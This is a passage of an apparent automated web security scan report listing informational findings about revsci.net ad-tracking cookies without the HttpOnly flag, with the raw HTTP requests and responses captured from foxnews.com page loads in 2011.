Set-Cookie: rsi_segs_1000000=pUPF5kOBL3IQT7uItGE2XpyB7su1FubvSC6kP38I2QQ4mm2N8+LE5ntqFncA2iMgLzp61YTXHAmxMT0BEofXzqA4q5nO0qB3YgnMEHRZn+GVPSDlVTVhzgssx0UibzpPBbx1sohw1Ku7XP/UpHQw8v7qToLx8h7btv3UOvsoBv+jNeizMRWk+91pVGXO4EbNtWt+Z7WENR6xBL79Yu7fwn74XuFPQ3KgSwnBj9m+Z82mokEBkUX+KGNheVRXk0E9bpCCb9nzo/d0pq6G3lekSwu3iTlIO7GfAmvzWuTt6XCh2iKpWk5xq4B9Iww3rXP2D0EE6lPfLJCdaydlvw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:41:16 GMT; Path=/
Set-Cookie: rtc_kQ5Z=MLsv8SVKcR5n5QK06RsEefos1n9qAqSNqOTc1vAOx18gmPRntkb+X6ew46Qd/e8D0k2HLWH0SnhjxyMEIYa9cFjm9hqKilvuUgHGjE4ROPSm3gG33mcGhvBHWDxsf3HGKAK+fZEWt79CRGXQwhpDVvDo/cXdwgK+5tNZZE67ZZ/7ESRFEnoycfhd4gt+FzZQPhAE0heYFZiskph5OSof6dxvmIMivXTp4ylLQeYUIAVWNFqAQj8T3lJXoQcw/N1DSbsqKUFApvlKeoGXZR4mqqN7DLaaQuzGzPwx+FG7xrR8XPF9nxui0whM/am5qG8m2qAX4vb+HuYkCHzq6PvePG/iZqeiDINRSgDtOsLHX/Ecogf8MMS+uDN74BvnXLSmlfvQjeNcQLcoZwGAhOp52Ft/THda2EY/irw6PMkGDAtu6CwLi1xg4umu7U+DTm5gq7YW28UEP5gUH00YVajQy+RyJUSFR5SnR42a10dhJ8urUlh/I1iHVK7Ff9rMbq1SpKIAEKNsF7bsZy0IqMsfOg+8bA==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:41:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:41:16 GMT
Content-Length: 759

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['E05510_10390','D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...
6.118. http://pix04.revsci.net/E05510/b3/0/3/1003161/411477495.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/411477495.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/411477495.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2XpwByK0AEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAyxxuIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXAgcYSPm8EZaD/7SpOSG3iaX3YTPoqBzoD8pH1IFIWVkxjl9F9nRQH1zMS+5igI9GGvOug4t0h1p/8J/FnlWRtvxbi3p+TVFAetR3xquJQK/0VsX9qB+HLnpGyx2GgE/nbk0Odce2Gyc3MJ8FduK/DOUFB0391Wa66ieCDitvryM6yN36H8d4H1kOXUx/XgVwhJd; rtc_aq6P=MLsv8SVKcR5n5QK06RsEefos1n9qAqSNqOTc1vAOx18gmPRntkb+X6ew46Qd/e8D0k2HLWH0SnhjxyMEIYa9cFjm9hqKilvuUgHGjE4ROPSm3gG33mcGhvBHWDxsf3HGKAK+fZEWt79CRGXQwhpDVvDo/cXdwgK+5tNZZE67ZZ/7ESRFEnoycfhd4gt+FzZQPhAE0heYFZiskph5OSof6dxvmIMivXTp4ylLQeYUIAVWNFqAQj8T3lJXoQcw/N1DSbsqKUFApvlKeoGXZR4mqqN7DLaaQuzGzPwx+FG7xrR8XPF9nxui0whM/am5qG8m2qAX4vb+HuYkCHzq6PvePG/iZqeiDINRSgDtOsLHX/Ecogf8MMS+uDN74BvnXLSmlfvQjeNcQLcoZwGAhOp52Ft/THda2EY/irw6PMkGDAtu6CwLi1xg4umu7U+DTm5gq7YW28UEP5gUH00YVajQy+RyJUSFR5SnR42a10dhJ8urUlh/I1iHVK7Ff9rMbq1SpKIAEKNsF7bsZy0IqMsfOg+8bA==; rsi_us_1000000=pUP1JU2j/wMU1Y1iQBIXbzy7gH/ihA5AE3QfIwz8xaSP/weZt/QtlANGXMBv9GRWUWkvW7oCUmYVXdoi++njdd5WYXAkEjXC3b6BYGuX4Z56nNueZBHer8W0Njx0fnPi+mTpJvoXuH3AGPPFPrjdsLdNGrzLRNIK2neDLTt85qBbBfuDCK7OTYIw6GjG8rXnzjcOLZx3vrwwn96lg6Hp74OpttH4t8ldO3N+DAROs+zPatL8p8geXY5kcKAtKe91HqUPfqhFa0UnFfqQEBSUgejq1USeaTQKh6b6+XNH+MHR4xEFlaA4lL01Xk0SaDaPMUBbFNFBs/CRzFvdnGR7Yh/A2/F66zclu+cW+HP8/1e+f2t0eQMEXHLswtkECnf+U4dy3j3E76Fb9jGR4BvqqDGVqi0KGYvRCRVainNGRn3m5kHP/46H5qbow5NmFLhAjPRzQCxD5asNAhQTo5I8W/le/szJGgOF4q3nw0INTDJW6ygOePhzIlW31o5Q+4F7PhNZFJR+NWfyQqAvOmai/NSKXKEIaAI7tQ0CyU3GCQWLMoSNGoQcncwNGrsUdVKECfuL6NtAbdLDGHzsBTNWkl7uDuuZlXGNdVHCxzKETc6QHCaT6JTiPER3e+e5YTxodI+LP3t/Yt1QYznHeYvAhi3R1kMc7IblPeDGlV8MKdDJyidtCuS9bT67TqQRdFTo5P0q/Wz/QJBJAm/HW6rVqe0NLirW; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2jH7b5aaSakC1Vxg80jsQpMZ/WRp4QDAVMIXPL0pRtkHUlxsDSMSyT40d3g9PNkmjzUycMRLNlRLQHFpSyLGY5hDuOC+N0tBrNd9cBGbCJGJccifsK6dI8o0hu1fI/eEFEAnHDPsK/YpRNnmR8L4RHZ2VqAiEPjG/hfb7pcnUO3uQiIK6jEC5BXe27/KTW/3P8PF1IA8UexF9jf4H7qqHg4fnkmamYYOi9ghHm3z5Baxa1MomEcaz9jcyL6I6rbqQWRyYS5KZgJhYEDTqDbHEksBVRyaBbcgG2aBSSgeVAAOQrIfKaR/+ja9krFLWox2wD5sTDrVZObCNTpgXyJprl5LU/D0RmSwmrY9oHPGg60MVZfnt3J+2V1a3+1ThXnfqWXY7dmfpeBSe7tHb03mbWeIuzSbnlH6fP0gD1QD1Ol6L0gJulVUa9FmV1tHK3oJgywmh8JOp8maHXuy/QvkkkvZNb7IS8o3j1AIMTH0JBtTXSsGnj8zZvxRbH09DOmI/J6ucYiD+N0CLYiNV01FRH+CPDJTeuBDBklKrs4gR0iKAEH2RgXZMyiOzWPfE94MTlKgJ5QHZ8Lb8xE2SNTB5plZMNKBZXn2HkhC6mNcWEiBe0VGuIyPlS7gEJSUPPYtpDHvhrCAplSfM0zjQUge9mubF8He04QLc6QbisrWSlG+Kh2XK27nZyBxCJOUbOrEar4rpZVWW38vpN/uzfLsqjLgx1MIrZZtVsBbCVj9+EUojgxvC8EQEF/7bArlOc0YkMPG4XrdFRfePlg1g5a+BeHsHl5jBHepcDbKJIkFJ+vL/PCMbcCNXK7exSH/Z1HxDKTvRWnTYEn0vvj3te2F8+QQvpeS/df6Olx8q6GlVs3YZ49fvCKNJI/izYWWfXXIeUY8mPlHhiu795E9lOHCkNMA3c0HF78e2GR08z/pjsepNoaRyi7Uj+8+8xy13145ID5oHIEU/p+nyCnTObgfX9Zx+qAj6GeslrckQMeVMBVB7aLQpimgGpnEf9XtPz6pAilL/DcZSwkydwMAkoyf80kpKFw/KBw1kYRiY3gw0+vsHfeE0Lv+DBNfio8ZfcWqoinV7GMIbrcoXD84FVbnuoezpB0MgW6bpxAh25nUM7tfv2bpMcyizDXFFqB1uviYs5t9F4C4hjumVJi8p40t5RLNXA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_aq6P=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EJESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5lmsbsVwZ3HWVujzlSO+7+QCt8SeAqAMEO0pdHOlwXtZ/bSmHu66WBFOadqLveHQcgzKmByqkFUQIS4Za3jEcroE3ia4qkYzAj22SLzyuxCuNtcFwlSKLDfLgmRJ9q0bwCU5poXaK5yamlWkchI9rOYtaQfXz96Js1WGlAShjXEmKfWRz0RaTx9vSg8rrp7Rm/aFCh47XrveaAN16gwTSIoJNQ5TuRwQ770mEpHQ6xYAKaNTgXMVoe8i5kpQG10naY898CLtg5U=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:51:16 GMT; Path=/
Set-Cookie: rtc_OCce=MLsv8SNKcR5j5rIfEu29cZQk1qHgb/GNFtDD/eZS85tW2nZ+4PdKBMFYSwStZcq2W36bSe0ta4aBtcbhLdgI9LoMGKa5GuMToA3eQeJsJkoClYAJNOpXPUFmzicpelh7G6kTqjCcVqwnbT6anjq7qwhyqKNe0Q+bXJhy63+RiD8V9pIT02XA7fs94tthljbYBpUdnp6bdfgqNke84X9v3vsueEp9WgNqt+j098lucnP0omJ4g3A43egtb0KQWOSq83VPTkQfGe9eLzlQ/v07ZrrDNgFfUxX1p9bNpusgNIHmYpu8oLbPiJQW4jZo2RErb1BtLkTFqX7kSuCpE5zCHCD50uVRp7rZHyj2WYkxHhyST5yyQ75NyeH07zX/d6NoFWYD+ou/3w5Y65C0r5Xjprva8MeN/Q9l1lWMMBCY43EBGnt6QbSG3cosa5cqJlraNXOD619Ive6sztZHfe6nrOwb0AmeuU3aTRM2ug6He1RHO6nxwnTn1TMReHrGrfMCGwczJXWXzCdVjnQMuTve3K4YE4vkJw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:51:16 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:51:16 GMT
Content-Length: 759

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['E05510_10390','D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...
6.119. http://pix04.revsci.net/E05510/b3/0/3/1003161/564853216.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/564853216.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/564853216.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBb3IQV+XT5RxDq2qIWAxW81lJ0QSlgYlQhAfV/yUINBw3cQgYrocUZKyvzimWAsuUtPsj5mWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTDVdntzlNMPA0y2boUy5Y7voYnl6yfgInYUDcW6SaAKQc8fmEXLMWnPd1UywCVDviQnU8+ot7CCucwAMHnPzp0i/Sn5tB+7puon3vUHjOAOCGmRh9dHzU6fIwRQmdiEhTO8yKU9t1bIy34gP5vFQ9MLGxzzqrLdQWtCrzaEs=; rtc_D3oY=MLsv7iUucA5nprADwxMUR9Sz0MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPr9SkW1eU9LpSn2tzgwRP0c/xx5jIRX7BMLqY4BgQC03lxOEmvvtSk5ET4IMDzv8yWjLYK7pDAruXWuMrqWQYCGy8NcEmqwJlS1r3QCTBMPKlGt8h8jhoskQYAEg5VB6abCKt0ty7d4V0r5LMiHjJ1yDDxjo3fWHFdlT0J3x3vNTBOP3u4LdR/ixLPJ4yHO+zAfzaP4HygF1suDMBuT4oX+Q3ErH7vVwhv5PsadCEykM5nhDDFNysSgXBEG+twoDa14AcpRzAbhEsFenqXNxpvSYpqc3Iy2NCgIfu7mw81csoIeKwTlkp9olnajK1wOkRn/RbFuU1Ma+eqf2bJ54C9QYGm/4BYb5mYPHUYbSUBiWvzEkXm4bqgQDP0t5t9xesus2w==; udm_0=MLv39SMJaSprpj6pbNkWOy/KQOJxPslkZwvSPcJbG2twwjyHCTcas2RpUa4WGBFvOb0pRtkHUlxsrSNtdETPkq36I/Y42AJDYid0lsh7axCOZzovkqpJZV2BFcL+fh5qubFWzYKJsapdJwmGdxMp5kZ2HRZuDh58AXR7DmKcoQRFldkApkJPC/e3v068qA9uii5PGoYde11HPBz8B6cjAO4VOUxDMYKpvQXW5aAhisKkKByp27xPuv6bjr0KKy/x/CcRwSpXviIz1OcezWsLCl5Ccp+VXWXyLGRbYG5j8CCadBulYAzPIIfabJm37qdA7kI5utzW72tehbMmqlOEgGT2x29KlKQm9qsocIMphShQSdjZ5KcQPrcWx+AgtpuRmbB/Tpoc6SMZxpQSWO7qMiEa9HBFGY620H+cxte0IcTnIgroAysHHS/30/F+XhasUyvMOyDr9zcWvPP/XgCm3R/v9nFKTI56Kl0rLMj+HmqbcAVEfS0IHgw2komvP0BCChCgLPw/y0h2UmQ/kRq8sCPVqjC6+A85pR0VGGmP7xDD9YSNv1xh9bxtAygc2SORF+es8YToNAl13ygc8zP1aPHg8s8h/XkBDmsBr6a92kkHm6QhwDGl0oFoxcjl8C+m7atiR9Fh4hefm4aBNxg4m0fOrcIXHluYbcqA7GNHQgEmAXDSKTKHtFbElK3Q/W+ZjI8aR5P4Lb8mZvtpc+Kx7N2oPsjFIjI0HspUdj0VYpVkLSR4b66YgfQrlr/cm7ZqG8uV8LwSNOx08abapPsQH/T1Uh3TiGiX73qP04E3mJdvnrpDYqhqehgHA+RPEu+Q9eaHBI4Gh9HciLJum+BUBRe3NoPfT9ZAbvazB8OPSQFC5LZmUjat7EmlF/oTYi2XpNz82zF91rv7lAOdyM+Jqhn+yTK0b52kQSyoy8Lr0apgP1ZJ28rZqHWJi5V6JbrLpFaE8BcHCNkvm6XFRs9YSIjYIokpwyQaXigdCoU/WchOnkIGV1sCvnF76a47S1zzRguw9xzip2wS0Hy/KkEBUcRJfTR7T/C9OEkbpJ07WzzmwOBDjF6Q/m5cB5KNJkGQXn8mDN6RpO005OeyOjDOOtBoVUVEQSd5hI3Y7NrRV02IrvC0a4ErsErV7oENx+ygUWHbQdl8XgiB/A==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_D3oY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq2qIWKwAWFhJ0QSlgYlQhEc6MiO0UzrToS2ouz039v0EpRxSyNYjyDwk4WWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1LPz1IKkcXv2UrwJMsSYTHHxBRWi5YvzbcS9nL86GEH1HVUbSK9jxJkdPngRGXOQPJ78QiRHBGDc2xz/D7O1XypqPR5QrEg54+vdWh0xj7X+jcjAI01pb2NtgjS5kOkLormF5qVWIduaEB5r0Y6geawA4cy/ikUSi8Oxv3ubgSjFKpaE8=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GQSa=MLsv8SMucB5j5hAH0vmC/252VHiLIgT9sbGvQkQvgrafLIBiBEREiMw9JMHYtmWAML6kTuNHWEhy9hojbdls+dquwaa5GuMToA3eQeIOKZU4EPLYIyw/1PF5b3337mlJR4MFicB6+ZhO4eo2hIosgeRPF1VsnEwSW73nLGe8/i9Fx925s2s5IqolwaPstmdeLowJqlIYdQ2l5XhdhHdkaxQvMw0eLcHsQ1mVT8azUmBbvyo/Cw6yNsQc4SsNfFGkesd1eUewEe1KFcSACCYGCX7PqHiCqh6JpcY3Xecg42q2j0Nb3H+oR/930ZfKST54xVszS/4aMJzKqAH0raB0p9t9kyBANRK56/5sDFV5v3gPUuIQrv12o3AZh2JKsvhbcS8oB8bsiS3iFlBeBhFQMXVeMoS1C1NjSBDpUHXi0ILIPeIjTtrWUgq4W2ZgGPlrvKgYwRx04vWr7RqamvgBSsOZkiq3KItyJkA6gszT33rHfwJ1wsam6ahy12FPJRWnA15T5vdg4Z+riVZhzvuy; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
Set-Cookie: NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Mon, 09-May-2011 16:21:06 GMT; Path=/
Set-Cookie: udm_0=MLv39SEJaSpn5l6pbNmEREzM5uAjEsBEzbqEBjKmOxigTwd3Jm/a81YhltY+GVTu54epWIHf3oi1YHPA5mRwJx+S5OA5wGpaU0FxNh20YQtqh7Jq46CjZzQOFzCA8aAByesBIAo00ISe+IVY7dIttA9A1pUGtLzZvCq3rXYChFFM0EXVYn1yRIHsw+s26EULmYA+EJOI7usAQ4PBo8hAKkvGzcFf6yFm4bhp5HlJwp+VSMTAzVtJgs16rbvZrbe7tUhKQqNyOcYuQOqESdHut0B/ClCVDZCGXHOgIpVeIXtztSycQLXe96R9/60MnY37g+F1eUb/v5AWeOJRAuAnvQCMgD2184azB/nLV9WvLKejguSkLSbXU0yZucIW5OEml4SWirEbHJQdr6E1KE8C4a+G1zWIaVH5iMSStdvaDgtE6ABR5j4uKOeGqffUGGv4jqiQgvkM9e1MFlsKqaLrLL783v1NVUjWjfzKG0T+BzCVr2HOmSwB3zXkdf9T643emWebLyeqb0g5fzErRQsc6Lojq2OxPLeauqHp9R4InEpl3vHud/H028UIculVcu7w0tBAkiPQkWvm4znX/x5QDAvXao+/cOfYlLnyVPZ+xGn0p3XTuO7oZmNoycqmpl1kwcITNey1oqVjJ7Cbg8fb+vOnh/Lued5F8G0VwRax/JeiZO5rSGzq9652jszBbmtL/h2Qgx++/bskGIgpYah0cnXakbrgraRxhFGDlSD/KbwaykFORMUQXDMgwvYcGAmOgIxMBPDqJFv693TuQcaNIK4osGfBrJqXrMbJEA3Z1dffqXxel6JUzhxqqjo8AVQmcz9ssb39BMTM65KV0hYFKC1qsrGxNKLgey5/Y24UHxQ+whlmS9HRzXN2toTV0z6XhaGd59vEoRlS9FwKqtZkAM4BlZxK2+Hew1ZY4q33KvEc9VFeBv2LeNliwAususjX+uGjmYorIi3dKfK/QBEobV7JjYz/7/1fCYnvMYcvrWONJKyXuqEZHelVnwMAXGi41ixsNQLrgJWriZG4vU7ACeoFPpPPVv/l3eMYLH2C7Ls69bgdvHFuObun+lmUppDcCbCTWIC20x0x1xV2RsLfwBkI5crenJ0m457tDrtkpFhuwnLc6r+NqKJdVkHrVP5b/37Kfzp/cvVBgP395HfdNa6OVM2wsJUhm3kaBIK5TEXB65o3b/oYn2kip4t6; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:21:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:05 GMT
Content-Length: 699

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...
6.120. http://pix04.revsci.net/E05510/b3/0/3/1003161/695826942.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/695826942.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/695826942.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5lmMLobyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYDKym3y4THvjzrfDIjpx+umtAA3ia4qkYzAj22SLzyuxCuNtcFwlSKLDfLgmRJ9q0bwCUxpoXaK5SamlWkchI9rOYtaQfXz96Js1WGlAShjXEmKfWRz0RaTx9vSg8rrp7Rm/aFCh47XrvgWQJup/wWLvcZH4pN+V5FIEyUA/v2Bt2WsXcaDfcDKCoe3QErwNOYxQdEag==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; rtc_yftK=MLsv8SNKcR5j5rKvi7rucZQk1qHgb/GNFtDD/WY8x18gmPS3yvdKBMFYSwStZcq2W35AfEghHnyiDCgEwe27pElUg8X8v8NZiYvvDQcHb2EcrzzYA+V3Rp3X4RdajVqjGfhZPpd//XrD4QnzuZutrhO5pfLINzYq6lNczX+1sNRXpJYKn/SO9Y2LCojamRji3HwN0umAD+C/kuzJSdyB1bzd1oBKC6uI8jhxiEJLyEl96cgjclheS3iWyvf92irFP3KCNXFb5VjqcBTZUFs9ORmuQqUR7P4GyHoh19L5Ri3q+yBrJYnaUMzG+BQZA0+p26Xp7UaGh2pzCVLJhJkdUu0PsG/ve25uLkrNMvHYscmFTutIg9JbCzY6TWp69oUR4AlKVs7J2DCxCRuWSkkayVVHMk1/dV4vmfGSHG4Bgr1PZKfIy8IXYHHYLfNLx3Z6g+gW1yepRK+07nyTrczsVQ1JLZtkslpVjAL5Ai/jdTgLoSM4I7Zq3qxEyeb3UVIVMyM6n8doRcZpCrd5mYLnDQB4sps=; 